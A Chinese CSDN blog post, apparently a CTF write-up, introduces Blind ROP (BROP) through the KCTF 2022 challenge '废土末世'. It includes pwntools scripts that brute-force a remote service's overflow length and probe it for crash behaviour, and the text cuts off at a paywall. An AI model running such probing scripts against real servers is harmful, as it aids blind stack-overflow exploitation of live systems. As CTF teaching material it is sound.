BROP入门之 KCTF 2022 废土末世

最新推荐文章于 2024-04-15 09:37:55 发布
最新推荐文章于 2024-04-15 09:37:55 发布
阅读量1.2k 收藏 7
点赞数 2
分类专栏: blind pwn 文章标签: 安全 pwn linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46483787/article/details/124933961
版权
本文介绍了BROP(Binary Run-time Exploitation)技术的基础知识和实战应用,以2022年KCTF的‘废土末世’为例,详细讲解了如何通过溢出长度的获取、程序结构泄露和gadget寻找,最终控制程序执行流并实现getshell。
摘要由CSDN通过智能技术生成

定义

来自CTF wiki:
BROP 是没有对应应用程序的源代码或者二进制文件下,对程序进行攻击,劫持程序的执行流
攻击条件

  • 源程序必须存在栈溢出漏洞,以便于攻击者可以控制程序流程。
  • 服务器端的进程在崩溃之后会重新启动,并且重新启动的进程的地址与先前的地址一样(这也就是说即使程序有 ASLR 保护,但是其只是在程序最初启动的时候有效果)。目前 nginx, MySQL, Apache, OpenSSH 等服务器应用都是符合这种特性的

基本思路

暴力枚举获取栈溢出长度,逐字符比较泄露返回地址,获取gadget,leak出ELF进行进一步分析,写rop来getshell

实战

接下来我们以2022 KCTF 的第六题废土末世为例子,一起来分析一下BROP类题目的解题流程

泄露缓冲区长度

如果是BROP类题目,那么一定会有溢出点,所以首先通过爆破获取缓冲区长度:

def get_overflow_length():
    global io
    len=1
    while True:
        try:
            io=remote("221.228.109.254",10045)
            sa("hacker, TNT!\n",'a'*len)
            print("now trying length is "+str(len))
            res=io.recv()
            io.close()
            if "TNT TNT!" not in res:
                return len-1
            else:
                len+=1
        except EOFError:
            io.close()
            return len-1
print("overflow length is "+str(get_overflow_length()))

然后来看看结果在这里插入图片描述

可以看到缓冲区长度应该是16

泄露程序结构

接下来就是要去泄露程序内容,这里我们将程序返回结果分为三种:

  • 正常运行
  • 等待输入或陷入死循环
  • 程序崩溃,接收到EOF
def probe(payload):
    global io 
    try:
        io=remote('221.228.109.254',10031)
        sa("hacker, TNT!\n",payload)
        res=io.recv(timeout=3)
        if "TNT" in res:
            return "success"
        else:
            return "stuck"
    except:
        return "crash"

对于本道题来说,知道缓冲区为16,所以要爆破的是第十七字节,从0到255,于是写下如下代码:

ans=open("ans.txt",'wb')
for i in range(256):
    ans.write(
最低0.47元/天 解锁文章
再探ROP(下)
KKABqN
05-16 2458
文章目录0x01 概述0x02 ret2reg2-1 起因2-2 原理0x03 brop详解3-1 概述3-2 逆向思维切入1)搭建环境2)溢出长度和爆破canary3)如何getshell4)寻找直接条件5)寻找间接条件0x04 尾记 0x01 概述 先说一下这篇文章的脉络结构: 一、ret2reg 的学习和理解 二、brop 的学习和探讨 虽然分为两部分,重头大戏还是brop的学习和探讨,ret2reg的知识就是就是对前面知识的变换,很简单,所以不做深入,不占用篇幅。在概述里面我会简单说一下brop
一个程序员的成长之路
weixin_35713159的博客
04-13 1456
equals一般比较对象内容是否相等,而==比较两者的栈中保存的对象堆地址值是否相等,即是否指向同一个对象,equals在object中就存在,如不重写的话两者没有区别,重写时一般使用hashcode方法结合,比较相等首先判断hashcode是否相等,相等再进行真实值的比较,大大降低比较时间,最多两次即可判断。原因:在一个范围中的浮点数个数不是有限的,存在精度问题,如果要进行比较,使用BigDecimal并使用BigDecimal提供的对象方法进行计算,构造时使用String作为入参防止丢失精度。
kctf:kCTF是一个基于Kubernetes的基础设施,用于CTF竞赛。 有关文档,请参见
05-14
kCTF kCTF是一个基于Kubernetes的基础设施,用于CTF竞赛。 先决条件 入门/文档 有关什么是kCTF以及它如何与Kubernetes交互的介绍,请参阅 。 其他文档资源包括: –快速入门指南,向您展示如何在本地构建和测试挑战。 –一切正常运行后,请尝试将其部署到Google Cloud。 –帮助解决难题。 –有关kCTF安全注意事项,包括有关资产,风险和潜在攻击者的信息。
KnightCTF-2022_The Hungry Dragon
weixin_46245411的博客
01-23 619
我感觉这是一个很有意思的3D 文件(附上链接:The Hungry Dragon) 打开发现是一个3D模型, 然后下一步需要看一下有没有什么其他信息, 这里提示说“需要发现这条龙吃了多少甜甜圈和糖果”,所以我们需要“进入它的身体看看~” 点击“混合现实”, 直接滑动鼠标滚轮,进入恐龙的食道, 可以看到,确实“有点东西”在里面。 下一步就是统计一下绿色的糖果和黄色的甜甜圈了, 虽然都是两个“绿色的糖果”和一个“黄色的甜甜圈”,但是仔细一点就可以发现,它们出...
*CTF 2022圆满落幕,0ops战队夺冠
Cyberpeace的博客
04-18 531
*CTF 2022圆满落幕,0ops战队夺冠!
PWN学习总结(四)—— BROP
qq_41988448的博客
12-11 2795
pwn学习总结(七) —— BROP描述攻击条件攻击思路例题判断栈溢出长度寻找 stop gadgets寻找 brop gadgets寻找 puts 函数的 plt 地址寻找 puts 函数的 got 地址并 dump plt 表getshell 描述 BROP(Blind ROP)于 2014 年由 Standford 的 Andrea Bittau 提出,其相关研究成果发表在 Oakland...
探索 KCTF:Google 创建的安全竞赛平台
最新发布
gitblog_00089的博客
04-15 514
探索 KCTF:Google 创建的安全竞赛平台 去发现同类优质开源项目:https://gitcode.com/ 是一个由 Google 开发的开源项目,全称为 "Kernel Challenge Toolkit for CTF"(CTF 挑战内核工具包)。这个平台专为构建和运行安全相关的竞赛,如 Capture The Flag (CTF) 比赛而设计。本文将深入介绍 KC...
BROP(黑盒pwn
F_Day_的博客
10-20 1162
BROP(黑盒pwn) 这题很有意思,通过黑盒的方法来进行溢出攻击,同时这里也用到了__libc_csu_init函数利用的新姿势 题目是:brop 参考链接:https://wiki.x10sec.org/pwn/linux/user-mode/stackoverflow/x86/medium-rop/#_8 做这道题,不要ida,否则没有意义了 思路 对于黑盒,这道题的目的也很明确,就一个输入就结束了,明显的需要溢出 那么第一步就是通过不断测试字符长度来判断溢出点 这个实现还是很简单的 def ov
利用Return Oriented Programming(BROP)技术进行攻击
Return Oriented Programming(BROP)技术简介 ### 1.1 什么是Return Oriented Programming(BROP)技术 Return Oriented Programming (BROP) 技术是一种用于绕过现代系统的内存保护机制的攻击技术。它利用程序中已经...
第47天:KCTF-独树一帜
S1lenc3的博客
12-16 278
被这么一道题整自闭了。 很容易看出,加密函数就是401000函数。 然后发现程序逻辑如此简单明显,估计5分钟搞定。 用C语言写脚本,写了2个小时左右,一直失败,我吐了,对于内存访问冲突和初始化我无能无力,这个坑我还没爬出来,所以放弃了。然后用python写的脚本,这里要注意3个byte_xxxxxx。 起初,我以为这三个不连,而忽略了后两个,其实: 所以,只要给他们都赋值...
看雪 KCTF GMAE 闯关记
shao65308的专栏
08-29 2672
用010editor打开,修改压缩文件加密标志位为00,保存后就没有密码了。如果不能识别把 / 替换成空格。
中级ROP之BROP
至臻求学,胸怀云月
02-25 3192
Blind ROP 基本介绍 于2014年提出,论文题目名为Hacking Blind,BROP是指在没有对应应用程序的源代码或者二进制文件的情况下,对程序进行攻击,劫持程序的执行流。 攻击条件 源程序必须存在栈溢出漏洞,以便于攻击者可以控制程序流程。 服务器端的进程在崩溃之后会重新启动,并且重新启动的进程的地址与先前的地址一样,目前nginx,mysql,apache,openssh等服务器应...
Blind Return Oriented Programming (BROP) Attack - 攻击原理
omnispace的博客
03-29 4736
0x00 写在前面 第一次在WooYun发文章,不知道是否符合众客官口味,望轻拍。 这篇文章翻译至我的这篇博客,主要介绍了一种叫做BROP的攻击,该文章主要介绍原理部分,对该攻击的重现可以参看我的另外一篇博客。 BROP攻击基于一篇发表在Oakland 2014的论文Hacking Blind,作者是来自Standford的Andrea Bittau,以下是相关paper和slide的链
栈溢出之BROP
Sakura给爷pwn全场
01-01 246
Blind Return Oriented Programming (BROP) Attack - 攻击原理: https://blog.csdn.net/omnispace/article/details/51006149 BROP: https://www.jianshu.com/p/2bd323e7e97f
[KCTF2021] 南冥神功 wp
小黑的猫窝
06-03 398
[KCTF2021] 南冥神功 wp运行IDA反编译迷宫 运行 试运行程序: IDA反编译 拖入ida,F5反编译,经整理如下: 迷宫 阅读代码知这是一道走迷宫的题,迷宫为: 偶 S 0 1 0 0 1 0 0 1 1 奇 1 1 0 0 1 0 0 1 0 0 偶 0 0 1 0 1 1 1 1 1 0 奇 0 1 1 0 1 0 0 1 0 0 偶 0 0 1 0 0 1 0 0 1 1 奇 1 1 0
KCF
Touch_Dream的博客
08-12 3931
转载:http://www.cnblogs.com/YiXiaoZhou/p/5925019.html KCF是一种鉴别式追踪方法,这类方法一般都是在追踪过程中训练一个目标检测器,使用目标检测器去检测下一帧预测位置是否是目标,然后再使用新检测结果去更新训练集进而更新目标检测器。而在训练目标检测器时一般选取目标区域为正样本,目标的周围区域为负样本,当然越靠近目标的区域为正样本的可能性越大。
中级ROP
m0_49959202的博客
09-23 497
文章目录中级ROP1.原理1.1 ret2csu1.1.1 libc_csu_init展示1.1.2 可用gadget介绍1.1.3 组合使用gadget思路1.1.4 类似于libc_csu_init,其他可用的gadget1.1.5 利用libc_csu_init尾部偏移,控制其他寄存器1.2 ret2reg1.2.1 原理1.2.2 防御方法1.3 BROP1.3.1 概念1.3.2 攻击条件1.3.3 攻击原理1.3.3.1 栈溢出长度1.3.3.2 Stack Reading1.3.3.3 Bli
BROP_轮子
09-16 657
总体思想:爆破buf长度-----爆破canary-----find stop_gadgets-----find brop_gadget-----find puts()/write()-----泄露函数的got地址得到libc-----编写ROP 将 socket 输出重定向到输入输出 寻找 “/bin/sh” 的地址。一般来说,最好是找到一块可写的内存,利用 write 函数将...
PWN】初见BROP
2301_77342543的博客
07-29 300
第一次BROP,它让我觉得pwn,或者说网安很妙,也很折磨在遇到它之前,之前接触的题目都是简单的栈溢出,感觉没有啥有趣的,很简单,找gadget溢出就可以,一切都看得见可遇到它之后,这是真的折磨,一切都是未知但是因为未知,所以产生了美感,或许是因为摸不着,所以才有一种神秘的魔力一点点吸引我学pwnBROP(Blind ROP),于 2014 年由 Standford 的 Andrea Bittau 提出,这种攻击方式是实现在无源代码和二进程程序的情况下对运行中的程序进行攻击。
CTF笔记:bugkctf各种绕过
Ghostmey的博客
05-20 429
BUFKCTF各种绕过 打开后得到 分析 通过shal加密是的uname和passwd加密后的值相同 但是二者加密前值不同 所以可以利用shal加密处理不了数组的bug 使得null=null 从而成立 可以利用maxhackbar 构造如下 获得flag ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值